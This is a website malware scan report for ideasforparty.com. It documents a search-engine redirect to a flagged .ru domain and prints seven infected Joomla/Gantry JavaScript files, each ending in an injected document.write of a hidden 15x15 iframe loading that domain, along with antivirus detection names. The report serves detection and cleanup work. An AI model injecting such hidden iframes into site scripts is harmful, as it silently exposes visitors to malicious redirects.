New scan:

Malware Scanner report for ideasforparty.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ideasforparty.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://goalsettingflipping.ru/desktopthrow.cgi?8
40 websites infected. goalsettingflipping.ru is marked by Google as suspicious.

The website "ideasforparty.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
7/0/13
7 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ideasforparty.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://ideasforparty.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: ideasforparty.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 10:25:24 GMT
Location: http://goalsettingflipping.ru/desktopthrow.cgi?8
Server: Apache
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://ideasforparty.com/
200 OK
Content-Length: 41983
Content-Type: text/html
clean
http://ideasforparty.com/media/system/js/caption.js
200 OK
Content-Length: 2127
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1023 bytes skipped]...
> container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/components/com_gantry/js/gantry-totop.js
200 OK
Content-Length: 891
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.1(\'5\',2(){3 a=$(\'6-7\');8(a){3 b=4 9.c(0);a.d(\'f\',\'g\').1(\'h\',2(e){4 i(e).j();b.k()})}});',21,21,'window|addEvent|function|var|new|domready|gantry|totop|if|Fx|||Scroll|setStyle||outline|none|click|Event|stop|toTop'.split('|'),0,{}));document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/components/com_gantry/js/gantry-smartload.js
200 OK
Content-Length: 2416
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1749 bytes skipped]...
srule|checkPosition|scroll|getSize|||length|undefined|GantrySmartLoad|placeholder|fx|Fx|size|typeof|window|start|200|exclusion|get|scrolling|else|spinner|addClass|Sine|split|Transitions|addEvent|transition|bind|easeIn|setOptions|getPosition|250|Asset|initialize|duration|image|opacity|onload|Style|img|chain|Hash|removeClass|gif|blank|set|implement|Class|Events|opera|Options'.split('|'),0,{}))
;document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/components/com_gantry/js/gantry-buildspans.js
200 OK
Content-Length: 885
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: goalsettingflipping.ru

var GantryBuildSpans=function(g,j,k){(g.length).times(function(i){var e="."+g[i];var f=function(a){a.setStyle('visibility','visible');var b=a.getText();var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().setText(' '+rest),span=new Element('span').setText(first);span.inject(d,'top');a.replaceWith(d)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.getTag()=='a')f(a);else f(b)})})})})};document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Decoded script:


<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/components/com_gantry/js/gantry-inputs.js
200 OK
Content-Length: 3126
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[2520 bytes skipped]...
ick|false|setArray|each|10000px|position|setStyles|absolute|hasClass|checks|true|return|left|InputsExclusion|checkbox|all|removeClass|morph|set|setStyle|display|radio|none|switchReplacement|for|remove|replace|gecko|join|getProperty|hasKey|fireEvent|radios|right|init|setProperty|get|radioparent|direction|body|document|getStyle|new|Hash|version|push|content_vote|ie7|domready'.split('|'),0,{}))
;document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.CYW
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
F-Secure
Trojan.JS.Iframe.CYW
Norman
IframeRef.DJ
Sophos
Mal/HappJS-A
GData
Trojan.JS.Iframe.CYW
BitDefender
Trojan.JS.Iframe.CYW

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/templates/rt_camber_j15/js/load-transition.js
200 OK
Content-Length: 973
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

((function(){
var animation = function(){
var body = $('rt-container-bg');

if ((window.gecko && document.getElementsByClassName) || (window.trident && !document.querySelectorAll)){
if (body){
body.setStyles({'visibility': 'hidden', 'opacity': 0});
body.removeClass('rt-hidden').effect('opacity', {duration: 800, transition: Fx.Transitions.Quad.easeOut}).start(1);
}

return;
}

if (body) body.removeClass('rt-hidden').addClass('rt-visible');
};
window.addEvent('load', animation);
})());
;document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

TrendMicro-HouseCall
TROJ_GEN.F47V1113
Kaspersky
HEUR:Trojan.Script.Generic
Norman
IframeRef.DL

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com/index.php/whats-sewing-kit.html
200 OK
Content-Length: 43323
Content-Type: text/html
clean
http://ideasforparty.com/index.php/component/user/reset.html
200 OK
Content-Length: 46868
Content-Type: text/html
clean
http://ideasforparty.com/media/system/js/validate.js
200 OK
Content-Length: 4409
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[3000 bytes skipped]...
alse) {
el.addClass('invalid');
if (el.labelref) {
$(el.labelref).addClass('invalid');
}
} else {
el.removeClass('invalid');
if (el.labelref) {
$(el.labelref).removeClass('invalid');
}
}
}
});
document.formvalidator = null;
Window.onDomReady(function(){
document.formvalidator = new JFormValidator();
});document.write('<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

Malicious iFrame found.
size: 15x15     
src: http://goalsettingflipping.ru/desktopthrow.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://goalsettingflipping.ru/desktopthrow.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15">

http://ideasforparty.com//modules/mod_unitconverter/tmpl/converter.js/
404 Not Found
Content-Length: 428
Content-Type: text/html
clean
http://ideasforparty.com/test404page.js
404 Not Found
Content-Length: 398
Content-Type: text/html
clean
http://ideasforparty.com/index.php/component/user/remind.html
200 OK
Content-Length: 46827
Content-Type: text/html
clean
http://ideasforparty.com/index.php/component/user/register.html
200 OK
Content-Length: 47811
Content-Type: text/html
clean
http://ideasforparty.com/index.php/home.html
200 OK
Content-Length: 45683
Content-Type: text/html
clean